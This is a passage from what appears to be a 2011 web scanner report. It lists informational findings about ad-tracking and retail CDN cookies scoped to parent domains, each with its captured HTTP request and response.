Host:	http://adserver.veruta.com
Path:	/track.fcgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
cmid=20772879917; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979325968%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758514%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://t.p.mybuys.com/webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510850857&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ueid=1461734246|1305465412|8|2; cmid=20772879917

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Set-cookie: ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
Set-cookie: cmid=20772879917; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
Content-Length: 65

<html><head><title></title></head><body><div></div></body></html>

12.24. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:55:23 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:23 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:55:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.25. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.media.bluefly.com
Path:	/media/templates/images/topnav/bluefly_blue_navi_logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A935623E7FA6107F30EEA0CB0E3247A1; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/topnav/bluefly_blue_navi_logo.gif HTTP/1.1
Host: cdn.media.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Wed, 19 Aug 2009 15:02:34 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "5fe2-8fc-4717fecc59680"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:20 GMT
Server: Apache
ETag: "5fe2-8fc-4717fecc59680"
Expires: Mon, 16 May 2011 10:29:20 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A935623E7FA6107F30EEA0CB0E3247A1; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
Via: 1.1 cdce-nym011-013.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.26. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/css/custom-theme/bluefly_jqui.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A7EF03BC7FA6107F316B91C463EC5928; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/css/custom-theme/bluefly_jqui.css HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Tue, 17 Mar 2009 19:55:01 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "41b0-6881-46555f1406f40"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A5D332927FA6107F321CBBFE605BF4CE

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:17 GMT
Server: Apache
ETag: "41b0-6881-46555f1406f40"
Expires: Mon, 16 May 2011 10:29:17 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A7EF03BC7FA6107F316B91C463EC5928; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
Via: 1.1 cdce-nym011-019.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-018.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.27. http://cdn.www.bluefly.com/media/css/mybluefly.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/css/mybluefly.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/css/mybluefly.css HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Tue, 09 Nov 2010 23:11:12 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "771a-ba4f-494a6db536400"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A5D332927FA6107F321CBBFE605BF4CE

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:18 GMT
Server: Apache
ETag: "771a-ba4f-494a6db536400"
Expires: Mon, 16 May 2011 10:29:18 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
Via: 1.1 cdce-nym011-013.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.28. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/login-submit.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=AEF6BF247FA6107F3291AC8BAB1516C6; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/login-submit.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "3839-bba-450e97f3abac0"
If-Modified-Since: Mon, 30 Jun 2008 22:08:19 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "3839-bba-450e97f3abac0"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEF6BF247FA6107F3291AC8BAB1516C6; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-011.nym011.internap.com
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
Via: 1.1 cdce-nym011-011.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.29. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/subh-create-account.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=AEF637347FA6107F30AC9DF5B1018F77; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/subh-create-account.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "382a-309-47bcf0a69df80"
If-Modified-Since: Mon, 28 Dec 2009 19:37:50 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "382a-309-47bcf0a69df80"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEF637347FA6107F30AC9DF5B1018F77; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
Via: 1.1 cdce-nym011-019.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-018.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.30. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/subh-returning-customers.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=AEEAE4E27FA6107F31AAFDF870B371A3; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/subh-returning-customers.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "3843-35a-47adcc546fc00"
If-Modified-Since: Wed, 16 Dec 2009 18:35:28 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "3843-35a-47adcc546fc00"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEEAE4E27FA6107F31AAFDF870B371A3; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
Via: 1.1 cdce-nym011-018.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-019.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.31. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/submit-submit.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A918C73C7FA6107F31F3FF7AB403FF9F; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/submit-submit.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Mon, 30 Jun 2008 22:08:22 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "384b-c0e-450e97f688180"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:19 GMT
Server: Apache
ETag: "384b-c0e-450e97f688180"
Expires: Mon, 16 May 2011 10:29:19 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A918C73C7FA6107F31F3FF7AB403FF9F; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 cdce-nym011-015.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

12.32. http://dis.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uic=*1Tomxq8BrFqEZpOQ1bYZp%2fBO4dZgo%2b527C6zdnJIE1IWT1EPmKzBQb4n5pBlPC%2fT%2fB3YzVvHSJbrylzlwjU6Iy9ny1g89DtKdShGo4u19iVt5FU670PqdTOIyNxrGJItJ; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
udi=*1yi90rI1ylE1uj7gpL89Aeg%3d%3d; domain=.criteo.com; expires=Tue, 17-May-2011 02:01:31 GMT; path=/
dis=*1jiNeCk4kGIZ9mu6mPVBINFP44jJN2GwOkV4%2f%2ft9P33QKlB82NkB5zNkzE%2bekrFzM8SSGQa6U2CckAyo3mINtneKAVrvoC%2fboyA5mZpGi41ULSg0gVtk0sRCj6W62P3adaTaqypakl79Ry4nKG5uVqUR9F4AYF9WxfRJbZkS2EIVE2W209%2bPDJPrRWr33FkzHwAotwKaHsjDezbx9FPSVVVyUxz16CXz0T%2fKisSwO7BSGDea496TpUYJfHwtWUIX4OiCA0EkiWo66M7dH4pxYg05Gfyn87OaKvkdXer5hgIUx5EOBCA%2bQCmaHCTx7rJwUqtwkEryIcS8GT782Xww7sDg6zIRkRFJrSTemCS6u%2fKqr%2fpxT0arnV3oClxANx0CyRh1ULL3qPB0ZaONp2JBfF3Do4BJgpUHQJ5DTaOCWFHHqlxMwZpRlU2rL9zOyEzLY; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328 HTTP/1.1
Host: dis.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; uid=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; udi=*1ypiRHADgqOVLDzaJM2HozQ%3d%3d; uic=*13JJ4nVPBAZvX2oxLwxp72%2bPVcWJipruAaTcA3NuXJY2JZGgNsOGwxO9iV9ymXnS%2bRQrrGOhzs%2bgk8Hk%2fqXmKug%3d%3d; dis=*1O2O5m5J47iEnqZueLcqWtxcCi4uVmADkQsltgy969MzJl6hD0vJ9%2fYTs%2fXz4L%2ftUgL0Qy7BFIVMt8wwPwcmXYjb1pfZJNm7ONgbr495PvCrP%2bwYOZcbVabsTKpC7%2bUtdEXhHsUjV5QnjJbWD3rKEe73L0gNDHiML57wLUKPvzIf1XJTn89FQ4HhOAY1M9we5sdbBMugi6Uqt6nHW0Jt9ktDEwZzLQqkBa4IloWNE1MtaoHzfQzaFR4y0BUBsZ7DFYp2IZixF8et2lMNosgRxRWp79%2bM4TKMH6JAqdW%2bjpziQK7lZIHWWJDRuAZ6DwSBoamG%2fkBKk%2bKAtHbz1dwkmVEkQVb%2fIze05p%2fqSp4wiAPKRsFYXVNumVIafblcuOqcb

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Mon, 16 May 2011 02:01:30 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: uic=*1Tomxq8BrFqEZpOQ1bYZp%2fBO4dZgo%2b527C6zdnJIE1IWT1EPmKzBQb4n5pBlPC%2fT%2fB3YzVvHSJbrylzlwjU6Iy9ny1g89DtKdShGo4u19iVt5FU670PqdTOIyNxrGJItJ; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Set-Cookie: udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Set-Cookie: udi=*1yi90rI1ylE1uj7gpL89Aeg%3d%3d; domain=.criteo.com; expires=Tue, 17-May-2011 02:01:31 GMT; path=/
Set-Cookie: dis=*1jiNeCk4kGIZ9mu6mPVBINFP44jJN2GwOkV4%2f%2ft9P33QKlB82NkB5zNkzE%2bekrFzM8SSGQa6U2CckAyo3mINtneKAVrvoC%2fboyA5mZpGi41ULSg0gVtk0sRCj6W62P3adaTaqypakl79Ry4nKG5uVqUR9F4AYF9WxfRJbZkS2EIVE2W209%2bPDJPrRWr33FkzHwAotwKaHsjDezbx9FPSVVVyUxz16CXz0T%2fKisSwO7BSGDea496TpUYJfHwtWUIX4OiCA0EkiWo66M7dH4pxYg05Gfyn87OaKvkdXer5hgIUx5EOBCA%2bQCmaHCTx7rJwUqtwkEryIcS8GT782Xww7sDg6zIRkRFJrSTemCS6u%2fKqr%2fpxT0arnV3oClxANx0CyRh1ULL3qPB0ZaONp2JBfF3Do4BJgpUHQJ5DTaOCWFHHqlxMwZpRlU2rL9zOyEzLY; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Content-Length: 4888

<html>
<head>
<title>Dising</title>
<script type="text/javascript">
function edcTimeout(){}
function write_edc(){}
function initEdc(){}
function cto_AI(u,n,r){if(document.createElement){if(r){v
...[SNIP]...

12.33. http://html.aggregateknowledge.com/iframe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://html.aggregateknowledge.com
Path:	/iframe

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid=801458892474636324; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 01:58:28 GMT; Path=/
